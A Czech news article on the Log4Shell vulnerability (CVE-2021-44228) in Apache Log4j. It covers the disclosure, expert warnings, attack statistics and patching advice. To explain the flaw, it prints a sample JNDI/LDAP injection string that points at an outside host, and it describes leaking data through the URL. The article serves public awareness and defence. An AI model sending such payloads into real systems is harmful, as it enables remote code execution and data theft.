Článek
V pátek 9. prosince technik čínské firmy Alibaba zveřejnil ukázku toho, jak zneužít dosud neznámou chybu. Ta se skrývala v nenápadném – ale velmi populárním – bezplatném nástroji Log4j. Jde o knihovnu určenou ke snadnému monitorování běhu programů a využívají ji velké platformy i malé projekty na celém světě.
Už během několika hodin bylo jasné, že půjde o zranitelnost s velkým dosahem. Desátého prosince dostala chyba označení CVE-2021-44228 a americký Národní úřad pro standardizaci a technologie její závažnost ohodnotil jako kritickou (stupeň 10 z 10).
Zranitelnost v Log4j je možná nejzávažnější bezpečnostní dírou, kterou jsem ve své kariéře viděla.
„Tato zranitelnost je jednou z nejzávažnějších, které jsem za celou svou kariéru viděla, ne-li tou nejzávažnější,“ uvedla pro CNN Jen Easterlyová, ředitelka americké Agentury pro kybernetickou bezpečnost a bezpečnost infrastruktury (CISA). „Očekáváme, že zranitelnost bude široce zneužita sofistikovanými aktéry. Máme omezený čas na přijetí nezbytných opatření, abychom snížili pravděpodobnost škodlivých incidentů.“
Její kolega Jay Gazlay, bezpečnostní specialista CISA, varoval, že celkem mohou být napadeny „stovky milionů zařízení“. Přestože již existuje záplata, byla by podle něj „chyba předpokládat, že jde o problém, který se podaří vyřešit za týden nebo za dva“.
Jak se bránit zranitelnosti Log4Shell
Zranitelnosti typu zero-day jsou nebezpečné, protože je může útočník zneužít k napadení systému okamžitě. Mezi zero-day patří i zranitelnost CVE-2021-44228, která se nalézá v knihovně Apache Log4j2 verze 2.14.1 a starších.
Tato zranitelnost umožňuje útočníkovi spustit na napadeném stroji jakýkoli kód. Může tak smazat data, ukrást část databáze, nainstalovat škodlivý program nebo způsobit jiné škody. Výrobce chybu opravil tím, že možnost spouštění vlastního kódu ve výchozím nastavení zakázal.
Správci systémů by měli zkontrolovat, zda na svých serverech využívají nástroj Log4j2, a pokud ano, měli by neprodleně aktualizovat na verzi 2.16.0 nebo novější (už ve verzi 2.15 byl problém částečně opraven). Aktualizace je k dispozici ke stažení na stránkách projektu. Před nainstalováním by měl správce ověřit pravost a integritu instalované záplaty pomocí PGP nebo GPG klíčů.
Verze 2.17.0 opravuje další chybu, která umožňovala DDoS útoky: „Verze Apache Log4j2 2.0-alpha1 až 2.16.0 nechránily před nekontrolovanou rekurzí z autoreferenčních vyhledávání. Pokud konfigurace protokolování využívá jiné než výchozí rozložení vzoru s vyhledáváním kontextu, mohou útočníci (…) vytvořit škodlivá vstupní data, která obsahují rekurzivní vyhledávání(…). Tento útok je také znám jako útok DOS (Denial of Service).“
Pokud správce z nějakého důvodu nemůže okamžitě instalovat aktualizaci, měl by alespoň (ve verzích 2.10 a vyšších) zapnout nastavení log4j2.formatMsgNoLookups, které zabrání zneužití chyby. Více informací na stránkách Apache.org.
Pro řadu firem může být ale oprava chyby obtížná, protože knihovna log4j může být různě integrována do dalších nástrojů. Správci sítě by tedy měli být připraveni rychle aktualizovat používaný software. Podrobnosti naleznou i na stránkách Národního úřadu pro kybernetickou a informační bezpečnost.
Už 11. prosince Easterlyová varovala, že zranitelnost představuje velkou výzvu. Koncoví uživatelé se totiž proti ní nemohou nijak zvlášť bránit a musejí spoléhat na to, že jejich poskytovatelé služeb prověří svůj software. „Řeknu to naprosto jasně: Tato zranitelnost představuje vážné riziko. Potenciální dopady minimalizujeme pouze prostřednictvím spolupráce mezi vládou a soukromým sektorem. Vyzýváme všechny organizace, aby se k tomuto zásadnímu úsilí připojily a přijaly příslušná opatření.“
Hackeři to zkouší všude
Problémem této konkrétní zranitelnosti je nenápadná všudypřítomnost knihovny Apache Log4j, ve které se chyba nachází. Řada firem ani nemusí vědět, že mají tento bezplatný nástroj na svém serveru zprovozněný. Útočníci to ale mohou zjistit velmi rychle, a pokud na serveru najdou nezáplatovanou verzi Log4j, mohou na dálku spustit téměř jakýkoli kód.
Kyberbezpečnostní společnost Check Point upozorňuje, že snaha o zneužití nejnovější zranitelnosti v Apache Log4j připomíná kybernetickou pandemii: „V pátek po odhalení zranitelnosti byly hlášené ‚jen“ tisíce útoků. Během soboty počet útoků vzrostl už na 40 000 a 72 hodin po odhalení zranitelnosti počet útoků překročil hranici 800 000."
„Pokusy o zneužití zranitelnosti zaznamenalo více než 40 % podnikových sítí po celém světě,“ uvádí tisková zpráva Check Point. „V Česku hlásí pokusy o zneužití zranitelnosti dokonce 51 % podnikových sítí.“
Podle antivirové firmy Avast jsou ohrožené i známé internetové platformy jako Apple, Amazon, Steam, Twitter nebo Minecraft. „Zranitelnost umožňuje útočníkům přístup k cizímu zařízení. A to třeba odesláním speciálního textu do chatovacího okna zranitelné aplikace. Následně mohou zařízení infikovat malwarem, krást data nebo je jakkoli jinak zneužít,“ uvedl bezpečnostní výzkumník Jakub Křoustek z firmy Avast. „V nebezpečí nejsou pouze zařízení přímo připojená k internetu, útočníci se dokážou dostat i do vnitřních sítí, které tyto speciální vstupy následně zpracovávají za použití zmíněné knihovny Log4j.“
Jak zranitelnost Log4Shell funguje?
Opensourcový nástroj Log4j slouží k zaznamenávání událostí, což je užitečné pro vývojáře softwaru. Nástroj může do záznamů přidat i vstup od uživatele. A pokud uživatel v tomto vstupu odkáže na nějakou interní proměnnou (například ${java:version}) bude nahrazeno používanou verzí Java.
Kombinací nástroje JNDI (Java Naming and Directory Interface) a protokolu LDAP (Lightweight Directory Access Protocol) může útočník do zápisu poslat odkaz na soubor uložený kdekoli na webu: ${jndi:ldap://example.com/a}. Za určitých okolností tak může na server propašovat vlastní kód, a dokonce jej spustit.
Dokonce i v případě, že je spouštění kódu zakázáno, může útočník využít tuto zranitelnost ke krádeži dat. Vloží vybrané proměnné do parametru své URL a napadený server mu pak pošle informace, o které „požádal“.
Aktualizace: Do článku jsme doplnili podrobnosti o zranitelnosti i návod, jak se bránit. Doplnili jsme další citáty odborníků.